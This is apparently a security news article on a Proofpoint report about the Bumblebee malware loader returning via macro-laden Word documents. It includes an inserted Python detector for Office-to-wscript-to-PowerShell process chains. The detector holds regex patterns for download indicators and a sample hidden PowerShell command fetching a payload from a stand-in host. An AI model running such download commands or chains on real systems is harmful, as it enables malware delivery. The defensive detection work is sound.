The sophisticated Bumblebee loader is back in the threat landscape hive after a four-month hiatus, with a new email campaign targeting thousands of organizations in the US.
Bumblebee, an initial access loader used by multiple cybercriminal groups to drop various payloads such as infostealers, banking Trojans, and post-compromise tools, first appeared on the scene in March 2022. Until last October, threat actors relied on it heavily as a popular malware loader, after which it disappeared from researchers' radar.
The loader was back in a campaign observed this month by the Proofpoint Threat Research Team, according to a blog post published Tuesday. The campaign employs several thousand emails with the subject "Voicemail February," sent from the sender "data@quarlesaa[.]com" and containing malicious Microsoft OneDrive URLs.
These URLs lead to a Word file with names such as "ReleaseEvans#96.docm" that spoof the consumer electronics company Humane. The attack chain ultimately uses a PowerShell command to download and run a Bumblebee DLL file as an entry point for further malicious activity, the researchers found.
The return of the loader is a harbinger of things to come, Proofpoint researchers noted, as it "aligns with a surge of cybercriminal threat activity after a notable absence of many threat actors and malware."
2024 "has started off with a bang for cybercriminal threat actors, with activity returning to very high levels after a temporary winter lull," the researchers said. "Proofpoint researchers continue to observe new, creative attack chains, attempts to bypass detections, and updated malware from many threat actors and unattributed threat clusters," adding that they expect this flurry of activity to continue until summer.
Other malicious groups returning to action after a break include groups that the researchers track as post-exploitation operator TA582; aviation and aerospace-targeting actor TA2541; and email campaigns delivered by TA571 that deliver the DarkGate malware, among others.
Bumblebee Malware’s New and Noteworthy Flight Path
There are a few key aspects of the campaign that set it apart from previous attacks using Bumblebee. For instance, the campaign uses VBA macro-enabled documents, a tactic that threat actors have rarely used since Microsoft began blocking macros by default in 2022 to thwart malicious activity, the researchers said.
In the latest campaign, the Word document used macros to create a script in the Windows temporary directory, which the macro then executed using the "wscript" utility. Inside the dropped temporary file was a PowerShell command that downloaded and executed the next stage from a remote server, stored in a file called "update_ver." The next stage was another PowerShell command, which in turn downloaded and ran the Bumblebee DLL.
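As an added example, not code from Proofpoint or from the article, the following Python script shows one way a defender can flag the chain described above in process-creation telemetry: an Office application spawning wscript.exe or cscript.exe, the script host running a file from the user's temp directory, and a PowerShell child whose command line carries a download indicator. It generalizes slightly beyond the article by also rating an Office-spawned script host with no shell child as a medium-severity finding. The event records, process IDs, the example.invalid URL, and every file name other than the document name and "update_ver" quoted in the article are constructed for the demonstration.

```python
"""Added example: flag the Office -> wscript -> PowerShell chain in process-creation telemetry.

The events below are constructed (Sysmon Event ID 1 style), not real logs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int       # process id of the created process
    ppid: int      # parent process id
    image: str     # full path of the created process
    cmdline: str   # command line as logged


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Script dropped into the user's temp directory, as in the campaign described.
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)
# Common PowerShell download / encoded-command indicators.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|-enc(?:odedcommand)?\b",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_macro_chains(events):
    """Return one finding per script host spawned by an Office application.

    Severity is 'medium' for Office -> script host alone and 'high' when the
    script host goes on to spawn a shell; each finding lists its reasons.
    """
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings = []
    for host in events:
        if image_name(host.image) not in SCRIPT_HOSTS:
            continue
        parent = by_pid.get(host.ppid)
        if parent is None or image_name(parent.image) not in OFFICE_APPS:
            continue
        reasons = [f"{image_name(parent.image)} spawned {image_name(host.image)}"]
        severity = "medium"
        if USER_TEMP_RE.search(host.cmdline):
            reasons.append("script host runs a file from the user temp directory")
        for child in children.get(host.pid, []):
            if image_name(child.image) in SHELLS:
                severity = "high"
                reasons.append(f"{image_name(host.image)} spawned {image_name(child.image)}")
                if DOWNLOAD_RE.search(child.cmdline):
                    reasons.append("shell command line contains a download or encoded-command indicator")
        findings.append({"pid": host.pid, "severity": severity, "reasons": reasons})
    return findings


# Constructed sample: one malicious chain, one macro-run script host without a
# shell child, and benign processes started from Explorer.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\ReleaseEvans#96.docm"'),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'"wscript.exe" "C:\Users\alice\AppData\Local\Temp\dropped.vbs"'),  # constructed name
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -WindowStyle Hidden -Command "
              '"Invoke-WebRequest -Uri http://example.invalid/update_ver -OutFile $env:TEMP\\update_ver"'),
    ProcEvent(700, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "EXCEL.EXE"),
    ProcEvent(800, 700, r"C:\Windows\System32\wscript.exe",
              r'"wscript.exe" "C:\Scripts\report-macro.vbs"'),  # constructed name
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"),
    ProcEvent(600, 100, r"C:\Windows\System32\wscript.exe", r'"wscript.exe" "C:\Scripts\logon.vbs"'),
]


if __name__ == "__main__":
    for finding in find_macro_chains(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] pid {finding['pid']}: " + "; ".join(finding["reasons"]))
```

Anchoring on the parent-child relationship rather than on a hash or file name keeps the rule useful when the dropped script name or the download URL changes between campaign waves; the temp-directory and download-indicator checks only raise the confidence of a match.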
Interestingly, the attack chains used in Bumblebee's pre-hiatus campaigns were significantly different, the researchers noted. Earlier campaigns sent emails that contained URLs leading to the download of a DLL which, if executed, started Bumblebee; or the emails contained HTML attachments that leveraged HTML smuggling to drop a RAR file that, if executed, exploited the WinRAR flaw CVE-2023-38831 to install Bumblebee.
Other earlier Bumblebee campaigns leveraged emails with zipped, password-protected VBS attachments which, if executed, used PowerShell to download and execute the loader, or emails that contained zipped LNK files to download an executable file that started Bumblebee.
"Out of the nearly 230 Bumblebee campaigns identified since March 2022, only five used any macro-laden content; four campaigns used XL4 macros, and one used VBA macros," according to the researchers.
Defenders Beware
While Proofpoint has not attributed the recent Bumblebee campaign to any tracked threat actor, the use of OneDrive URLs and the sender address appear to align with previous TA579 activity. The firm included a list of indicators of compromise (IoCs) to support threat hunting.
The researchers also urged organizations to be on alert for the malicious email campaign hallmarks noted above, and said that they have assessed with "high confidence" that Bumblebee is being used "as an initial access facilitator to deliver follow-on payloads such as ransomware."
Organizations can also employ basic security best practices to avoid compromise by malicious email campaigns, such as conducting employee training to help people identify phishing and other targeted scams, and implementing email security-scanning software that flags suspicious messages before they reach employee inboxes.